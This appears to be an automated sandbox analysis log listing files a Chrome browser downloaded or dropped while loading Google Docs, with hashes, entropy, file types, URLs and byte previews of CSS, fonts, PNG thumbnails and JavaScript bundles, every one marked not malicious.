                                                                                                                                                                                                                                        SHA-512:70EBD35E97C491E19427939B50DB70DC083A362D1CDC6B6FE890E1FEFCEB37D58B46650311F561230C31E1BAF02EC813F2D0B08A31D2FCB6D3187C2F5A099EB2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://docs.google.com/static/document/client/css/3155988811-KixCss_ltr.css
                                                                                                                                                                                                                                        Preview:@charset "UTF-8";.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}:first-child+html .goog-inline-block{display:inline}.goog-palette{cursor:default;outline:none}.goog-palette-table{border:1px solid #666;border-collapse:collapse;margin:5px}.goog-palette-cell{border:0;border-right:1px solid #666;cursor:pointer;height:18px;margin:0;text-align:center;vertical-align:middle;width:18px}.goog-palette-cell .goog-palette-colorswatch{border:none;font-size:x-small;height:18px;position:relative;width:18px}.goog-palette-cell-hover .goog-palette-colorswatch{border:1px solid #fff;height:16px;width:16px}.goog-palette-cell-selected .goog-palette-colorswatch{background:url(//ssl.gstatic.com/editor/editortoolbar.png) no-repeat -368px 0;border:1px solid #333;color:#fff;font-weight:700;height:16px;width:16px}.goog-palette-customcolor{background-color:#fafafa;border:1px solid #eee;color:#666;font-size:x-small;height:15px;position:relati
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):115909
                                                                                                                                                                                                                                        Entropy (8bit):7.994973283200089
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:3072:szEQPtX+pV2Jz4/1yMqSbDDjLTQwVNgZmI:szLtupV2Vc8M137kwV4mI
                                                                                                                                                                                                                                        MD5:EDB5A82850CF4A262C08B4DFAC496FDA
                                                                                                                                                                                                                                        SHA1:AC0158C8A7B81577295E4B0967C7089DC9DD00A0
                                                                                                                                                                                                                                        SHA-256:19C745FB90E147D73AD12D92B0849B325B8F3D4D314A79D1ABA427D6B7063A50
                                                                                                                                                                                                                                        SHA-512:992A78CE7FCE0F1045AB7E7B121A2ED7695AA95271B4508E408B76EFAD038FDF76B435806CD64603BC4DD1F61A6BFAE679EFB63FA303DC63522FB6A7E91FC16E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1NKpAWFC3Pr3cUcFzlofqJ2OBFSG-Wk2MOS2l8AY_CHU_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(...IDATx...1........_Y+.zB...G.... ,@X......@egH..(;.k..j.8<..e....yd.s.9..1333.gf..l9..".......[.W..........:..9U....Vc..Y.9ZV..!g...C..R.{..Zmjf&n..0.}..<.-QJ.a..j*.O....}.h.......!.h..W......K.=..R..&..)..%..Q.j.M.....z......._.S.H....cccc.3M.F.1.....1...3..^ge.Q....4..k......g..rN..RJ...,.....f..p...??..A..ja.+.8~x..MQ.. >p...-.....p....<.Q.N NQ..v...BT.p(...u..L..I...O...k-\.q..1.q.[.....d......[n.....k.w..l6...."...........r.P/Zy.w..fg.@...)2..(]f."....XP.V.5[S.q@...F......d7^{.j.....!..h......K.=.Q}l...9&....,/pg .1.O.....s..t.yTs..T.L\..`.9F.J...h..FKJ..#\...D.U..%.v.../\.......B.P.~6.p.*..b..U..6..5w!.c..=.2..........HN..._.......S.0.aa?.\*...3..+..{..#2.@..D....C...........8.......Q..>V"..B.....t4b.S..9E..>v.u..~.....Fs.1... ....#.Xr(1V.PF...fpo..y.A...."xH..*..O.#|h.X5..9...3x.<...F,.+.;......</R....<..s..M..a...hnn...L\..8u.{..Avn......gB.W`V2<.5..`..Q.{.E...tP...0Kx0.(#..^.T.......z.i:.r
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 1664, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):1664
                                                                                                                                                                                                                                        Entropy (8bit):7.800722707795522
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:b9Xwld63PE6EdXkGPFNZJxN2wwNL+vDpiD63DU6dvhuR:BHqXkG9v9wNL2iuTUgAR
                                                                                                                                                                                                                                        MD5:F19AC4E354F2BCE2E6341B804767E11A
                                                                                                                                                                                                                                        SHA1:A197ACF3FA097BFBAD358400BD07EAD8865F6FCC
                                                                                                                                                                                                                                        SHA-256:A631F36B97689FFB94AFDAEF8032E78479D469894A2B18F007DEA806DC1172B3
                                                                                                                                                                                                                                        SHA-512:F923634378A4236509C4F2C0514D4FA23B4DE4A28E24CB29EDAE81CA9204A9A8DACCC0621FA440FBE193AF51F4B72CF467229C04FC8240EFF2517D2B679D454D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/comfortaa/v45/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4WjMDrUfIA.woff2
                                                                                                                                                                                                                                        Preview:wOF2...................#.........................2..r.V.`?STAT..|....T.c....6.$.6. ..h.[...h.QTo&...`.XwB#4. E]=|..7.s..NH..5.+P..B.g)..P....3.Q.n.<..Q..........5M..i).N.H.../..{.....D....P.V.e.j..R].(.U7...`... ..p....FG.........Jy...O..j...,..x5.V.r....t`@9.....#..#.8.....o...ik*C9.R.LP.. ...4.hx.+.(WJ.R.b...y...+..-.T.H(b.@...;...9.AM......!.....=.b.e...C......E.HAV...B..H. .^.h...j-+o".Z9."...P'\9@....s,....o...J....,.<.....Y....R.-.G.\...x..Ya.;...P..DK;..(..........@.@&..#.9..l....'..w....x... ....-.y...Xh..y.....1.O.&.n.O..T.9.....b....V...L..jy8U...;..mj_.P.`C~.(W.........\......O=....0.!.....x.V.nA....b......A^|..i t..m#$.\h.6B'...b.9....&d....zE...|.L...P..".....+3U.....v\.aS.%."..B?.(|.PO*.`...*...T9..e....Gq.qn..3.L....3.R....L..w........D.m{...........q"..q.fKx|.)4\..6.....x$_MC..m]:o.?6...0.X..G.e.c4G....{.9.......9.Y.9.53.l.Q5....;.._,.KS....By......J}.....z...'/~d8zm..P.e..a.9.f....F...fp...fm.F=P...P..M.N..H.i..k"2..~....|.V.s$.Xd...&>[,..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (530)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):317324
                                                                                                                                                                                                                                        Entropy (8bit):5.380891956424149
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:9vTy/AhvO3gD5t3oY2E95vULuIvq/Gdok:9by/AFO3YdvUKIwO
                                                                                                                                                                                                                                        MD5:ABCF3344F7EE89C9E1C71B5C6FF0428F
                                                                                                                                                                                                                                        SHA1:E900BC071B82F5BF861C57EF1DBE2C12FB658BF5
                                                                                                                                                                                                                                        SHA-256:EBB92A69BBB7AD3619B6F6EE37EE5E01EE05F144D732DC4ED3CD99B63B9155A5
                                                                                                                                                                                                                                        SHA-512:9CD621B8E8C4621C7E71C483E39EF4CC3D6A9BCDE7C593A4A18E3CFD92A290DBC21C7F3400F9B426227F81B9E429218A878556A9AA30F88DFC02866216657E97
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:mK(Q1a);.var Otf="#FFFFFF00",Ptf="%s already belongs to %s",Qtf="%s is not an allowed shape property for a MediaClip.",Rtf=", exitAnimation=",Stf="100",$L="11",aM="24",Ttf=":animation",Utf=":background",Vtf=":document",Wtf=":guide",bM="AM",Xtf="Document does not contain MediaClip with ID %s",Ytf="Illegal id: %s",Ztf="Invalid nesting level: %s",$tf="Not a shape: %s",auf="OBJECT_WITH_CAPTION_TEXT",buf="ONE_COLUMN_TEXT",cuf="PICTURE_WITH_CAPTION_TEXT",cM="PM",duf="SECTION_HEADER",euf="SECTION_TITLE_AND_DESCRIPTION",.fuf="SPLIT_TITLE_AND_BODY",guf="TITLE_AND_BODY",huf="TITLE_AND_TWO_COLUMNS",iuf="TWO_OBJECTS_WITH_TEXT",juf="Transform %s is not valid for object %s",kuf="VERTICAL_TITLE_AND_VERTICAL_TEXT",luf="bodyPlaceholderListEntity",muf="index %s is out of bounds",nuf="oB`",ouf="properties",puf="ro",quf="sketchy-addAnimation",ruf="sketchy-addEntity",suf="sketchy-addListEntity",tuf="sketchy-addMediaClip",uuf="sketchy-addPage",vuf="sketchy-animationProperies",wuf="sketchy-background",xuf="s
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 66276, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):66276
                                                                                                                                                                                                                                        Entropy (8bit):7.996827864944505
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:hWHRkoKnMRHs/7qNSfS7FOOdx4euM2PK1o2SZQdXyh:hCkoKnuHweAfaOeu+1o2SUyh
                                                                                                                                                                                                                                        MD5:4A18EE02A61C1E97B6A2BB549ECECFB6
                                                                                                                                                                                                                                        SHA1:903E2D62B1C0F4961B986C32A001746B960A476E
                                                                                                                                                                                                                                        SHA-256:F63FF627E6BED31DE1AD159CD550DD84108A6FEA88B1FEB03E3A59421B556734
                                                                                                                                                                                                                                        SHA-512:3BD3091352183AB041B1AC369908232B96897D1624DC1614E3B51D6CE8F9648E7B4F8601D3AB592B5A47D11CC7A53C7F9F9EEF281302D9EF1E73B968E1025E52
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/montserrat/v29/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jq0N6aXo.woff2
                                                                                                                                                                                                                                        Preview:wOF2..................x.................................X.`?STAT@..l...........<..@..x..6.$..l. ..h..o...[X...Ucl...!CjLk.S.d...R~......Bg...[.s0+B..l.r....+.o...........I.fr_vI..>..E.."2...&.<.....2.....u.R....1.C...Ah.}../..QCBE.!mV!N.U.T.D.LB._Kx..M...L...'...(..n.....e....].F.I4.A2.._....#.l~.wE.&....It2wd.4S..b.u..].G..!..Y.5.L.K...X.....<.de.....7..R.0....BF.\m.O..;kS.T..bYy.\....u...'.Re.p.L`....N......Hb.g...).g....T.....Ui..;....~.S...C..9&O.3.....-.b..r..&. .I.x...'..,/../H6........^?...I..2....../.Buu|..ln..C....cB.....)j..2p..2..K..(o...Y..+.....V4..6@.oS......r..4.].1e..+.._..._..7..&.Yq.v...........^.'....."W.......m..>5.UC.R...........{.o4...D-.,Y".b!.. Fa.f.X..a.F.u'F..X....<.6.._|&.|d......t.".......f..Q.\..]T:....R...J.['>S.j...E.....mo.1(.-..I(....Nr.k.S...]d..o$.m...!....0.v...#;..2fY;k.}.*s..P..:...}w..Kf.$;.d..t.o.+..f....Ru..X%..=....m.....C...C....=.!.U%..bj.l.J$.$.x...[.>..w..}.?...M....Z.j.c.tj.z.o.Vj....x.9Q..7.?ph
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 45536, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):45536
                                                                                                                                                                                                                                        Entropy (8bit):7.993627122085847
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:KsRpGWzvLKRnz9VDn7HdJiBcMaaZgHq0CaDtDM/WcdvfoBhZYkQG:5Rp7eRfn7HdJiBDagwDZM/PVkhakv
                                                                                                                                                                                                                                        MD5:3C33061F3F982F2234262844D0FEE4CA
                                                                                                                                                                                                                                        SHA1:C4BB9DD654244A9EEBE0D6F12ED4C4E853B18252
                                                                                                                                                                                                                                        SHA-256:6504F1B88B6DE335A0FC2D1802EF8B000F6569792F509D4635128DC0915D6D70
                                                                                                                                                                                                                                        SHA-512:9EF8F96559F614C2BBFE33D0F385C0A7723E6E95DF9EDA30ABFB6CCE879E5F39E22138773D57749FC762F12EC23E11ACC9DA0B6F4D99CD0A39D50C8F56B10D4B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/playfairdisplay/v37/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKeiukDV.woff2
                                                                                                                                                                                                                                        Preview:wOF2...............4...{..........................X...L..,.`?STATD..t.....@..Z..j..6.$..P. ..`..U..[...*c.({...'&..!&F................6.uf..S.l.V...i.x.........].D.,..K..@...:un..7_....D..K-M.mJM#....m.mV.A..'...~l.4T1.4........iF..#d.......G~.....>.r:.r...NC+..U..75..6...g.wp7...............J-<.h%....i.P_......P.R......)....BS.9.m./.*.M.>@....1.(..?..,...._.y.....J'...RP/c.&B..J..h....X.C...UBG|T.u+..e.I......[6...~...&...1.1..}......J..`....\?..aoZQ/lhL.}t@EH.y..ZA....HjP*.g.%d..<.....v._L...]...`.a.#<. <...KS......I....t..@[V-...^.xe.&...n@do.Y"....%T@p0..Xp..........>.}....7...D<.M.......ID...m%.A2....[a............j..;IJZ.....L.e.Kyd5"....OO8S.AR...~.c)....A.8..?8...RW....{..>..P(z.4.+............#/.....*9..j........`..N{h/tb...^.....t:c.57u[...`E.f..\..~.......D..UQ..~..x.hJ.H....Z.F.B~..S...[...q..-f).....mP....l.E..#.R...[...0I...0...h.eyGzu........_...Uw...Cr....+.B..9.&....~~.g..Z..y...^.p .i....$...,...$..Mm9.m.i&....n'.n`]......y..c:B;.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):39110
                                                                                                                                                                                                                                        Entropy (8bit):7.973037510570099
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:OtW1fIooPHormWtsqA0ackjma09+R6OAgQRfunV0iC5IwW5:D1fIn6DA7csjR47g4unvuW5
                                                                                                                                                                                                                                        MD5:6722E8F4FEB66A0307F5298868D9AD6B
                                                                                                                                                                                                                                        SHA1:6CA6CC3651191A14C80D6B6741F9E63D50D2DA75
                                                                                                                                                                                                                                        SHA-256:15B57EB1EE46F060DF9F0000A3BA84273B728AD1D82917699A488BBBC862F15F
                                                                                                                                                                                                                                        SHA-512:8CEE661997FE6B33CCAD6E438F9A92E1A32CCC58AB1636C3CF10AB1DC50ACD02D8C74C118FED6091D9454AE54111C69AC191CDB45E97EAE29AEC029C4FFC60CD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1DVC7KidbQ30a0cr8N4mP78GR98aiJA4r-36f1gIobcg_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx......._U.=3/m..*G...d0.6.9......p.`.........E.sN.g.0....0Y.r.....tW...}..XKBH+._..............t.Yf...aV`.2.,..k.Yf.eV`.2.,..k.Yf.eV`.2.,....Yf...}c...U.Z ".\P.{.....9..<f.>......J.f.,...... ....}..K..5.g!oxB.Jc....M....c.D.j?A.....s.X.x.....=.IG.K.....h..N. "...^QU8t...C....@...!P..h3..Lu....V...R.$.V.-...e/..g?.....9K.....a.gB......{m..8.L?gIa...,.i}.G..-.5k.w.+...C[.....e.. .F.Q..(""0..........?|....&......C.q.9R....Y..G....-..`C@e`/.:..[.....<U.K..o.K.......;.[.a..."."!...Q.$..`..E.......w.F...J.N..9"BD@B..;g...C#..#TE.X..6i.h.v..i.2..k..+.E..0h..P...........o}... h.|..j..j.q.&..b.+A....B"..,..L7...A...G=....C ..q_.4.R..jW.T3!...c;...1o..U<... .">..!d.7.{.3..l.FQ`..?f.!.@HH@X|.E+.]..s...xqg..R...eK5..m.q..)42..(.T...Y3..X..Gq.f.u.b2....A..`.H...F*.....<.!..b...Y..6!F.n...JD.z.H...<..:T.L.E.....*.URV.i.y.4;.[6...@ZM...'...BT.@....A....y..s^..nU.4.}..aL$...(........!..v./n....D...q.8.7..%
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 16944, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):16944
                                                                                                                                                                                                                                        Entropy (8bit):7.988141513824791
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:fk343PBgJa2WKzrDDPixmD+OxWHBVPH3T7Mn/nu8E:M+C1rDDiU6SWHr3/0/u8E
                                                                                                                                                                                                                                        MD5:D8BCBE724FD6F4BA44D0EE6A2675890F
                                                                                                                                                                                                                                        SHA1:D276FD769BCB675F8EFE42EBE3003C1D3255F985
                                                                                                                                                                                                                                        SHA-256:AA4650A411DFE1C9BEB794FFAF08C7909CDFBB05672D79B3A9976672CBBA75EC
                                                                                                                                                                                                                                        SHA-512:23F757EA3AFE6FEBE1E8EA935F0EE8690E1B1B1DA511788B529CC2FC38F7E454153CDBA6F84A6A0E19B294E5311625A03617CF98AAC150F17B88A53F3ED8B72A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/roboto/v18/KFOkCnqEu92Fr1Mu51xIIzI.woff2
                                                                                                                                                                                                                                        Preview:wOF2......B0.......t..A..........................d..@..J.`..L.R..<...........^...x.6.$..6. .... ..D._.%.....H.Q9.d..xn'.|.6.E.q.......cr2D!u...?T.*..M.6w;.;.4z..."*..f..g#H.E.I../...U....4.P...5D...."..O...e....oSh{..=..D....|pNu../...#4.I...../..n.I1..J@[V..0..I.....5.s.%..Q.b. )-.-..%GUK.'.B......(."...Q....64.M...._F.N.S......=...ve..t.z.P'...l.\..I2...;.K....f.../yN.*...H..S.6k2.d../........-..gS_....9....z.....3...XgO.R.$l(......A...u..x...iv.....S....x..........s4;Gs.....N....B.URQ.........k..P.'..m~N;..@....4....u...s..R*..; {v..`W.....;I.Z......M'+h_...*@T5..KQ.-.*..h-.?b.,.. .....n@%...^.Quu5.e...Q5..R...u..-.......'..;...+...9..]Tp.p....%1.....B...t.Ar..U..].*..sS... ..X,.7.E.....HRyv..Uv.X...1.Ql..M.=..~...._.ku..2.$...wu.C.{..C..6.;(A.(C.(K.(W..@..H..]..E.@..X.....P..X.1.pG.kf...J.....E......0.....k"...+.!NM.j.......P...6...F..:.a\h#.`.Nzgt{..Y\..C.O...hJ%.,0...T..6:~..i.8.g%..8S?.p.(.X.;...s."%.T.R.A...L.2c.....G.\..P.Z.:.M.6c.y..]
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (571)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):210705
                                                                                                                                                                                                                                        Entropy (8bit):5.478024371837771
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:bmcIXQWuh5WZbdVavEgsDRzq0bobGzjAhKjt0N59z6PTC9h99o9p+AL7/Uvg2ujO:fIKG3jeKKxsk3E+AL7Src6pJEh+F
                                                                                                                                                                                                                                        MD5:FA037FCDB76C0D1CA9AD1BDA5D5F752D
                                                                                                                                                                                                                                        SHA1:82363C564113C638663BDE3C6895A662A47E76CF
                                                                                                                                                                                                                                        SHA-256:F1392B7F6FF6034D1DE5E86C24EFC1D7D923A4E8DC68C7E44FFF447E109F682A
                                                                                                                                                                                                                                        SHA-512:A810BB85538B5CAD3F0D55DD51C963F7D9D9C445B291EF8DA1F614538F639725F92928DA081323C0FB463D831CC4F9AFA3E2E9F936E808B4BADBC2E7BE208C39
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:"use strict";this.default_SocialPeopleHovercardUi=this.default_SocialPeopleHovercardUi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x6f00c00, 0x0, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var ea,aaa,Ca,baa,Fa,Ua,mb,tb,eaa,Ib,Ob,Ub,Xb,Zb,cc,faa,gaa,nc,iaa,vc,wc,kaa,Ic,Jc,laa,ad,cd,Xc,Yc,hd,od,qd,rd,ld,qaa,Od,Pd,raa,Rd,Td,Wd,Kd,Ld,saa,le,ke,uaa,me,vaa,Fe,Ge,Le,Ve,Ye,jf,gf,kf,C,wf,Af,Nf,Sf,Caa,$f,Daa,eg,Eaa,Faa,Gaa,Haa,jg,ng,qg,Jaa,Kaa,Laa,Maa,Naa,Oaa,Lg,Paa,Saa,Taa,gh,Yaa,Waa,xh,bba,Ch,Fh,dba,eba,Hh,iba,jba,Zh,$h,kba,lba,mba,nba,pi,pba,si,qba,rba,Gi,Hi,tba,uba,zba,wba,xba,yba,Aba,Ji,zi,Ti,Ui,Fba,Hba,Iba,Yi,Kba,Lba,
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):48419
                                                                                                                                                                                                                                        Entropy (8bit):7.983881391518331
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:p3McRIGcdlJlymrOoyxCgzC6lnZs6swcsq/oLOick28AndfkzwF6ac+3:Bo3fdwZfZ5swP1OiHkdfQO
                                                                                                                                                                                                                                        MD5:8CADD9A6BB191B07E02AAA8FD4674C18
                                                                                                                                                                                                                                        SHA1:D11602FE15576BD73CF69C013F451F4476FF6EE6
                                                                                                                                                                                                                                        SHA-256:F223DD191DFDC71A242D3EC35C4BC3CD40A43000A81998F894E41D3D2A91AB34
                                                                                                                                                                                                                                        SHA-512:10D15479C4414D0CE3116D44864B274A105E7BEB0786482443AD7ED3F2A4BE565C954529D30010A51D8EC1B4C29310F3A0260D424236C3BEB0FC1A260963FBC3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1zydCGAlg20lIYsgbHObNU2BdeY8ej3_lYHrTlUJ0ekI_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx...1..0...yB...*........... ,.a........a...@X..... ,@X..... ,.a....@X..... ,@X..... ,.a........a...@X..... ,@X......twUefD,;v.C!..q..[.F...8....&.....Q.Y.....vt.{..m..%.......}..y.w]7M.c....,..8.Q..]..}..!.[...:..*.M.$.......:.#MS.G.....@...VEQ...yd...u]...@..a.....u.k...^..,Kzh..XH).yn.&..{f.N......8...$. ...H(Q(I......*."..$".E....$$*."H...K.d..^9...P...y...v...]...|.z..........y...V.V.U*..D"...f..n.......H$..Xl4....b.`....,[....|..d...|.-|&W*.|/3.`.j.......O.^.;..tz..e.b.|.....m..-..>>>T*U2..............N..Kz.....\... ....d.R...B......B`..]p......U.c.X..E..y.x<b,.t:Q\...Z.J.F...vc....N'...U.&Lh4.h4...a.O.~..4....\.....D"A( ...h.ZP.....[:...g.I..C... ...?.T*.|.....u8. U..l.nH....___..x<~:.^...l.P(..^...0.v;B..n...d...1...Z.....f3..U..o....f..........U....\..P5!y...;4..V<\.._.9..Z....\....>9._.V...K.(...,%.....Qa....D.b..P4.M".Z....n..c..4...(<....].. $..$@.........$ED...H"...@`..e}..|fv..a...}...y...#.....W...
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2086)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5058099
                                                                                                                                                                                                                                        Entropy (8bit):5.64543696872592
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:kZPlj2xIWGkhnH7r8JskiYdEw3NGv86GKN6:kZDL5
                                                                                                                                                                                                                                        MD5:C152C641D21E3F616552AD842BD2A0C9
                                                                                                                                                                                                                                        SHA1:9FA46644AA0D210F0F725B0E141434B7C191828F
                                                                                                                                                                                                                                        SHA-256:4AB2964695C041EB64AB4D65A8B8810732D6F0FBBEA9407CCBFBC445C16CE81B
                                                                                                                                                                                                                                        SHA-512:6603C7498E255D4FF8C0A2606913DB2BC946DFDBE80CAADD86DDBC3127FD4546D0682DFA4E498AEC27B70AAF728E16D11A278576EE994799F378A4DBE7E81CE1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:mK(T1a);./*.. Copyright 2021 Google LLC.. Licensed under the Apache License, Version 2.0 (the "License");. you may not use this file except in compliance with the License.. You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. Unless required by applicable law or agreed to in writing, software. distributed under the License is distributed on an "AS IS" BASIS,. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. See the License for the specific language governing permissions and. limitations under the License..*/./*.. Copyright 2024 Google LLC.. Licensed under the Apache License, Version 2.0 (the "License");. you may not use this file except in compliance with the License.. You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. Unless required by applicable law or agreed to in writing, software. distributed under the License is distributed on an "AS IS" BASIS,. WITHOUT WARRANTIES OR CONDITIONS
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):110634
                                                                                                                                                                                                                                        Entropy (8bit):7.991726724913241
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:3072:2giLsVuLCrBoIAxSGRpScd6HqU5+owTF2FuEP:2gedLCuFFRpeKQoTkFPP
                                                                                                                                                                                                                                        MD5:C26108F4C7018FF8A764C2C850057AE0
                                                                                                                                                                                                                                        SHA1:D44788425920D5100F09BF6CD0F532A538698CBC
                                                                                                                                                                                                                                        SHA-256:88F1531AE3BD4660AC3AD8D137217CD6B18618B706DE7CBA26005C3A86788CFF
                                                                                                                                                                                                                                        SHA-512:5F798DD0F50FC17ECDBB3D6B3DACA350EC2E2461FA5D525CD7DDB8445D787EA23451B9D90B33A68459EC658873B3592E27BC73F21F5C4069F148224B73D5D8EB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1nn3QqEiFkmr-HRi_CfA1U_CrQGhL61l-TQAosK2xfto_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx...... .E..X.eY..X2..F.4....Dx...J........,@....@.....,.....@.....,.......`... X... X.`....`... X......`... X... X.`....`... X.w..._.........,..Ro..... X.`....`... X......`........$.V8.c..;.5.f..m.. 6'.s.......>y....G?{...SU._.u..}..H....]..].i..L...*...nb.].zI.]M.. ....k.^..z.K.jX.I. .V.......,......l.R_W.)...DQ./...{......._.r..@.&.....~......L....k.^1k6IX..z..dH....WK.^.....$.f?..j.Z7.oIHLy.:d..K.B.....n.uj].... A...HX.E.T*k"b...+.Y....7."$. A.O:%.[.T.&.......!5-....g.=>r...?~.....r...k._...x.R .d.e.....A...<z....go?E~....b.o..9s.1..}.....Ph....SR..6KNI.Ab.<.E...|.......H...,.../o>F$$..<.=@....A..O.5..(.......nkbr......qp....>E.F`/...oL1p.tj..O.B/...L.~...%.......(UL..:Z.2k.4....x...w.|{.%F.n..V..r.5......q..L{O...z..^...T...77...3.m....-.AE#d.....e.-.U...J..n..S..^...{...^.....6.W..!......O..u.6.<....d.y..9r.I.u...=. ..j.....K.S#..G.4._*.{wn.tb..G.lv...C.....M...._..4m.P^3...]C...K.]x.9..)f.;.G.~.i
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):19353
                                                                                                                                                                                                                                        Entropy (8bit):7.958319409321121
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:v2ay1fbP96Y6iG8xeWKJlYO8g9uAwMop4xITY:+VhTnhD7QMFTY
